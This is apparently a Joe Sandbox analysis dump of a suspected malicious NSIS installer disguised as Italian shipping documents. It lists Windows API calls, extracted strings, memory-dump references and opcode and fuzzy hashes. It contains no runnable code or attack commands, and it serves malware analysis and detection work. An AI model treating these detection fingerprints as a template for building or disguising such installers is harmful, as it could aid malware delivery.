                                            • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
                                            • CoTaskMemFree.OLE32(00000000), ref: 0040464F
                                            • lstrcmpiA.KERNEL32(004226C0,0041FD30), ref: 00404681
                                            • lstrcatA.KERNEL32(?,004226C0), ref: 0040468D
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F
                                              • Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4
                                              • Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
                                              • Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                              • Part of subcall function 00406162: CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
                                              • Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC
                                            • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778
                                              • Part of subcall function 004048D1: lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                              • Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
                                              • Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A
                                            • API String ID: 2624150263-3554254475
                                            • Opcode ID: 4bae8adfc2f1ad16f51c5b997e9d1a132689266bb2bfdcf495d627e6f055046e
                                            • Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
                                            • Opcode Fuzzy Hash: 4bae8adfc2f1ad16f51c5b997e9d1a132689266bb2bfdcf495d627e6f055046e
                                            • Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D5E
                                            • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402D7A
                                              • Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
                                              • Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402DC3
                                            • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402F0A
                                            Strings
                                            • Null, xrefs: 00402E43
                                            • Error launching installer, xrefs: 00402D9A
                                            • soft, xrefs: 00402E3A
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
                                            • Inst, xrefs: 00402E31
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-3016655952
                                            • Opcode ID: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                            • Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
                                            • Opcode Fuzzy Hash: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                            • Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C
                                            APIs
                                            • GetVersion.KERNEL32(?,0041F510,00000000,00405148,0041F510,00000000), ref: 00405FCA
                                            • GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00406045
                                            • GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00406058
                                            • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
                                            • SHGetPathFromIDListA.SHELL32(00000000,004226C0), ref: 004060A2
                                            • CoTaskMemFree.OLE32(00000000), ref: 004060AD
                                            • lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
                                            • lstrlenA.KERNEL32(004226C0,?,0041F510,00000000,00405148,0041F510,00000000), ref: 00406121
                                            Strings
                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060C9
                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406014
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-730719616
                                            • Opcode ID: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                            • Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
                                            • Opcode Fuzzy Hash: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                            • Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 00404160
                                            • GetSysColor.USER32(00000000), ref: 0040417C
                                            • SetTextColor.GDI32(?,00000000), ref: 00404188
                                            • SetBkMode.GDI32(?,?), ref: 00404194
                                            • GetSysColor.USER32(?), ref: 004041A7
                                            • SetBkColor.GDI32(?,?), ref: 004041B7
                                            • DeleteObject.GDI32(?), ref: 004041D1
                                            • CreateBrushIndirect.GDI32(?), ref: 004041DB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                            • Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                            • Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55
                                            APIs
                                            • lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                            • lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                            • lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                            • SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                            • Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
                                            • Opcode Fuzzy Hash: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                            • Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8
                                            APIs
                                            • DestroyWindow.USER32(?,00000000), ref: 00402CC3
                                            • GetTickCount.KERNEL32 ref: 00402CE1
                                            • wsprintfA.USER32 ref: 00402D0F
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402D41
                                              • Part of subcall function 00402C8F: MulDiv.KERNEL32(?,00000064,?), ref: 00402CA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 722711167-2449383134
                                            • Opcode ID: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
                                            • Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
                                            • Opcode Fuzzy Hash: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
                                            • Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
                                            • GetMessagePos.USER32 ref: 004049FE
                                            • ScreenToClient.USER32(?,?), ref: 00404A18
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                            • Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                            • Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5
                                            APIs
                                            • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 00405619
                                            • GetLastError.KERNEL32 ref: 0040562D
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
                                            • GetLastError.KERNEL32 ref: 0040564C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: ds@$ts@
                                            • API String ID: 3449924974-968229870
                                            • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                            • Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
                                            • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                            • Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                            • wsprintfA.USER32 ref: 00402C62
                                            • SetWindowTextA.USER32(?,?), ref: 00402C72
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                            • API String ID: 1451636040-1158693248
                                            • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                            • Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
                                            • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                            • Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                            • wsprintfA.USER32 ref: 00406272
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00406286
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                            • Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
                                            • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                            • Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1273862796
                                            • Opcode ID: 24528be45ea09a3f7ac5a13fd2096c4ebf3b36ee43d704fa315ff26094b75486
                                            • Instruction ID: d64441b167dbaa37220482e4367b8cfe1fe36de5847b06fdd878dcec03421524
                                            • Opcode Fuzzy Hash: 24528be45ea09a3f7ac5a13fd2096c4ebf3b36ee43d704fa315ff26094b75486
                                            • Instruction Fuzzy Hash: EA916C34A00309DFFB58DB65D994BAEB7B6BF44B48F208539E401A7391DB369842CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-981061697
                                            • Opcode ID: b25085f14741a347b04d620baf6035c98565bda83c25100c1273dab4cdb60a80
                                            • Instruction ID: fff8fdc0a38b79303987ceab3d91c886610461a3b4a6bf59d98f745da4fc744b
                                            • Opcode Fuzzy Hash: b25085f14741a347b04d620baf6035c98565bda83c25100c1273dab4cdb60a80
                                            • Instruction Fuzzy Hash: D9F13A74A01249CFEB59DFA9C594A9EBBB7FF84300F208529D405AB366CB359C43CB90
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                            • GlobalFree.KERNEL32(?), ref: 004027F2
                                            • GlobalFree.KERNEL32(00000000), ref: 00402805
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
                                            • Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
                                            • Opcode Fuzzy Hash: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
                                            • Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9
                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
                                            • CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                            • CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
                                            • CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                            • Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
                                            • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                            • Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: 2344fa28adf823aa721914dfaf9d86753dcf4f9e528e9f01551be810ae930a6d
                                            • Instruction ID: 2f7865f299af777794225f68ceb65d0dfed07c19bdced6b3005a0f39af021673
                                            • Opcode Fuzzy Hash: 2344fa28adf823aa721914dfaf9d86753dcf4f9e528e9f01551be810ae930a6d
                                            • Instruction Fuzzy Hash: DF71AC30A00209CFEB58DFA9C590A9EB7B6EF84340F20893AD405EB255DF76DD46CB81
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401798
                                            • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017C2
                                              • Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
                                            • Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
                                            • Opcode Fuzzy Hash: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
